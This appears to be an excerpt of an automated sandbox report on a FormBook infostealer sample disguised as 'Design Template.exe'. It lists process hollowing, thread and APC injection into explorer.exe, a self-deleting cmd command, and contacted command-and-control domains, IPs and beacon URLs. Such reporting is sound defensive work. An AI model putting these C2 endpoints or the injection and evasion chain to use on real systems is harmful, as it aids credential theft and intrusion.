Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C90AF mov eax, dword ptr fs:[00000030h] 14_2_044C90AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov ecx, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h] 14_2_044AB944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h] 14_2_044AB944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C962 mov eax, dword ptr fs:[00000030h] 14_2_0448C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h] 14_2_0448B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h] 14_2_0448B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov ecx, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B513A mov eax, dword ptr fs:[00000030h] 14_2_044B513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B513A mov eax, dword ptr fs:[00000030h] 14_2_044B513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045141E8 mov eax, dword ptr fs:[00000030h] 14_2_045141E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC182 mov eax, dword ptr fs:[00000030h] 14_2_044AC182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA185 mov eax, dword ptr fs:[00000030h] 14_2_044BA185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2990 mov eax, dword ptr fs:[00000030h] 14_2_044B2990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h] 14_2_044B61A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h] 14_2_044B61A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045069A6 mov eax, dword ptr fs:[00000030h] 14_2_045069A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454EA55 mov eax, dword ptr fs:[00000030h] 14_2_0454EA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04514257 mov eax, dword ptr fs:[00000030h] 14_2_04514257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h] 14_2_0453B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h] 14_2_0453B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C927A mov eax, dword ptr fs:[00000030h] 14_2_044C927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558A62 mov eax, dword ptr fs:[00000030h] 14_2_04558A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h] 14_2_0454AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h] 14_2_0454AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04498A0A mov eax, dword ptr fs:[00000030h] 14_2_04498A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A3A1C mov eax, dword ptr fs:[00000030h] 14_2_044A3A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov ecx, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h] 14_2_0448AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h] 14_2_0448AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h] 14_2_044C4A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h] 14_2_044C4A2C
Enables debug privileges
Source: C:\Users\user\Desktop\Design Template.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00424EAA SetUnhandledExceptionFilter, 2_2_00424EAA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00424EBC SetUnhandledExceptionFilter, 2_2_00424EBC

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.50.252.64 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gxjljc.com
Source: C:\Windows\explorer.exe Domain query: www.betralifcannabis.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.modomo.amsterdam
Source: C:\Windows\explorer.exe Domain query: www.bestflowersandgifts.com
Source: C:\Windows\explorer.exe Network Connect: 47.105.113.141 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.2elden.com
Source: C:\Windows\explorer.exe Network Connect: 14.215.190.65 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.zq2003.com
Source: C:\Windows\explorer.exe Domain query: www.landreclaim.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rememberingedward.info
Source: C:\Windows\explorer.exe Network Connect: 156.226.160.56 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.chuanyangwenhua.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Design Template.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3292 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Design Template.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Design Template.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1030000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000002.502832403.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00431B5C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 2_2_00431B5C

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385453 Sample: Design Template.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 yashasvsaluja.com 2->36 38 www.yashasvsaluja.com 2->38 40 7 other IPs or domains 2->40 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 9 other signatures 2->50 11 Design Template.exe 1 2->11         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\Liebert.bmp, PE32 11->28 dropped 14 Design Template.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.2elden.com 156.226.160.56, 49724, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 17->30 32 www.landreclaim.com 198.50.252.64, 49725, 80 OVHFR Canada 17->32 34 13 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.50.252.64
 www.landreclaim.com Canada
16276 OVHFR true
160.153.136.3
 rememberingedward.info United States
21501 GODADDY-AMSDE true
34.102.136.180
 bestflowersandgifts.com United States
15169 GOOGLEUS false
156.226.160.56
 www.2elden.com Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
47.105.113.141
 www.zq2003.com China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
14.215.190.65
 gz01.bch.baidu-itm.com China
58466 CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCN true

Contacted Domains

Name IP Active
gz01.bch.baidu-itm.com 14.215.190.65 true
yashasvsaluja.com 192.0.78.25 true
bestflowersandgifts.com 34.102.136.180 true
www.realunitystudio.com 204.11.56.48 true
www.zq2003.com 47.105.113.141 true
rememberingedward.info 160.153.136.3 true
www.landreclaim.com 198.50.252.64 true
sexichef.com 34.102.136.180 true
sci-mfg.com 34.102.136.180 true
betralifcannabis.com 34.102.136.180 true
www.2elden.com 156.226.160.56 true
www.gxjljc.com unknown unknown
www.betralifcannabis.com unknown unknown
www.mirgran.com unknown unknown
www.modomo.amsterdam unknown unknown
www.bestflowersandgifts.com unknown unknown
www.sexichef.com unknown unknown
www.yashasvsaluja.com unknown unknown
www.rememberingedward.info unknown unknown
www.sci-mfg.com unknown unknown
www.chuanyangwenhua.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx true
  • Avira URL Cloud: safe
 unknown
http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== true
  • Avira URL Cloud: safe
 unknown
http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== false
  • Avira URL Cloud: safe
 unknown
http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== false
  • Avira URL Cloud: safe
 unknown
http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx true
  • Avira URL Cloud: safe
 unknown
www.zq2003.com/ma3c/ true
  • Avira URL Cloud: safe
 low
http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== false
  • Avira URL Cloud: safe
 unknown
http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== false
  • Avira URL Cloud: safe
 unknown
http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx true
  • Avira URL Cloud: safe
 unknown
http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== true
  • Avira URL Cloud: safe
 unknown